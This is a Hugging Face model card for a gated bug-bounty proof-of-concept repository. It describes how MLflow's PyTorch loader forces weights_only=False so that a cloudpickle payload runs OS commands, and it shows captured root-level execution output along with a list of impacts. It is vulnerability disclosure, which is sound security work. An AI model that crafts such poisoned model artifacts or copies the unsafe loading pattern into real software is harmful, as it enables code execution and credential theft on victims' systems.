Hugging Face's logo

01data-ai
/
mlflow_f006_pytorch_weights_only_false_rce

PyTorch
mlflow
security
proof-of-concept
rce
cloudpickle
weights-only
model-loading
huntr
protectai
Model card Files
xet
 Community

You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

MLflow F006 PyTorch weights_only=False Cloudpickle RCE

Payload repository for Huntr / ProtectAI triage.

Finding

MLflow PyTorch _load_pyfunc() hardcodes weights_only=False, overriding PyTorch 2.6+ safer loading behavior and enabling cloudpickle RCE.

Primary PoC

proof_f006.py

Vulnerable Behavior

MLflow 3.12.0's PyTorch flavor explicitly passes:

weights_only=False

into torch.load() on PyTorch versions >= 2.6.0.

PyTorch 2.6+ changed the default torch.load() behavior to reduce unsafe pickle deserialization risk. MLflow overrides that safer default and preserves unsafe full-object pickle loading behavior unless the user changes it.

Confirmed Behavior

Confirmed on:

MLflow: 3.12.0
Torch: 2.11.0+cpu
MLFLOW_ALLOW_PICKLE_DESERIALIZATION: True

The proof captures the actual torch.load() argument:

[CAPTURED_TORCH_LOAD] weights_only= False
weights_only_false_confirmed: true

The proof then confirms cloudpickle RCE:

marker_exists_after: True
marker_content: uid=0(root) gid=0(root) groups=0(root)
F006_CONFIRMED: MLflow passed weights_only=False and cloudpickle RCE executed under default config

The later error is expected and occurs after code execution:

AttributeError: 'int' object has no attribute 'eval'

The payload uses os.system(...), which returns an integer. MLflow attempts to call .eval() on that integer only after the command has already executed.

Why This Is Distinct

This is not merely "pickle is unsafe."

The distinct MLflow issue is that MLflow explicitly passes weights_only=False on modern PyTorch versions where the safer default would otherwise be expected. That MLflow-side override re-enables unsafe object deserialization in the normal PyTorch flavor load path.

Key Evidence Files
proof_f006.py
RAW/proof_f006_stdout.txt
RAW/proof_f006_stderr.txt
RAW/proof_f006_exit_code.txt
SRC/source_references_f006.txt
SOURCE_REFERENCES.md
ENVIRONMENT.txt
COMMANDS.md
REQUESTS_RESPONSES.md
SHA256SUMS.txt
Scope

Confirmed against:

Repository: mlflow/mlflow
Version: MLflow 3.12.0
Torch: 2.11.0+cpu
Component: mlflow/pytorch/__init__.py
Primary APIs:
- mlflow.pytorch.load_model()
- MLflow PyTorch pyfunc loader path
Impact

An attacker who can supply or influence an MLflow PyTorch model artifact can execute arbitrary OS commands when the victim loads that model with MLflow's PyTorch flavor.

Potential impact includes:

execution as the MLflow process user
environment variable and secret theft
cloud credential theft
model artifact theft or tampering
model-serving or validation infrastructure compromise
CI/CD compromise

This repository intentionally contains only MLflow F006 PyTorch weights_only=False cloudpickle RCE artifacts.
Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support